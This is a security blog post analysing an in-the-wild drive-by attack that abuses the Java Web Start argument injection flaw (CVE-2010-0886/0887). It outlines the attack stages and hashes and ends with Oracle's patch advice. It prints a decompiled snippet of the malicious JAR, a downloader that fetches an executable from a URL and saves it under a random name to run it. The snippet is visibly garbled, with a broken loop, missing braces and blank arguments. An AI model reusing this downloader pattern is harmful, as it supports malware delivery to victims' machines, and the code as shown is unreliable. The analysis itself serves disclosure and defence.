Analysis on Java Web Start Argument Injection Exploit

The recent discovery of Java Web Start Argument Injection vulnerability (CVE-2010-0886 and CVE-2010-0887) has opened a new opportunity for the bad guy to utilize it in drive-by download attack.

Here is a short write up on the example (in the wild) found early today, which exploiting this vulnerability.

The exploit was found on and here are the sequence of attack once opened on a vulnerable machine:

  1. <- The main exploit page
  2. <- A PDF exploit (but we are not going to discuss about it in this entry)
  3. <- Here is where the Java vulnerability is triggered
  4. <- The JAR file that will be executed by the previous page
  5. <- The actual malware that will be downloaded and execute by the JAR

You can get more details from the Wepawet analysis result.

The 4th link from the list above will lead you to a JAR file called t4.jar. JAR file? A Java malware? It is not really a java malware. The t4.jar will later download a binary (MD5: 5493bb325f4b3a1cc6efab226d1c4600 ) , which is the real malware, and execute it.

Lets see the snip code of the JAR file once decompiled :


public class Main
  public static void main(String[] args)
    throws Exception
    String exeurl = "";

    String s = System.getProperty("").toLowerCase();
    if (s.indexOf("win") < 0) {

      URL url = new URL(exeurl);
      InputStream inputstream = url.openStream();
      String fn = System.getProperty("") + "\\" + Math.pow(Math.random() * 1000.0D, 3.0D) + ".exe";
      FileOutputStream fileoutputstream = new FileOutputStream(fn);

      for (int l = 0; (k = != -1; ++l)
        int k;
    catch (Exception fe)

And finally lets see the result of Anubis analysis on the binary downloaded.

Oracle has released a security update for this issue on April 15, 2010. Users are highly encouraged to download the most recent release of Java SE to address these vulnerabilities.

Leave a Reply